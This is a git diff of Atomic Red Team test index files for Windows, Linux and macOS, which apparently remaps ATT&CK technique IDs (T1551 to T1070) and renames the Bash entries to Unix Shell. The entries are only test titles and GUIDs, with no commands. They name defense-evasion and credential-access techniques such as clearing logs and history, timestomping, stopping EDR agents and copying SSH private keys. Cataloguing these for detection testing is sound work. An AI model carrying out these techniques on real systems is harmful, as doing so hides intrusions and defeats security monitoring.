+defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -528,8 +528,6 @@ discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
@@ -562,6 +560,8 @@ execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,powershell
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 8552b91c..a59e81cd 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -35,25 +35,25 @@ credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-90
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
-defense-evasion,T1551.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1551.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
+defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
@@ -80,10 +80,10 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
@@ -139,10 +139,10 @@ collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symme
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Import,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index fe36ae27..c4425a90 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -41,19 +41,19 @@ persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Disable or Modify Tools,8,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -83,10 +83,10 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
@@ -119,12 +119,12 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6c473702..a6c9df00 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -64,8 +64,8 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
+defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
@@ -94,16 +94,16 @@ defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
-defense-evasion,T1551.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
-defense-evasion,T1551.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
-defense-evasion,T1551.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
-defense-evasion,T1551.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1551.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1551.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
+defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
+defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
+defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
+defense-evasion,T1070.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
-defense-evasion,T1551,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
+defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
@@ -131,9 +131,9 @@ defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),88
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
-defense-evasion,T1551.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
+defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
@@ -177,10 +177,10 @@ defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Exe
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
-defense-evasion,T1551.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
-defense-evasion,T1551.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
-defense-evasion,T1551.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
-defense-evasion,T1551.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
+defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
+defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
+defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 255e195c..af53cfc7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -30,6 +30,7 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
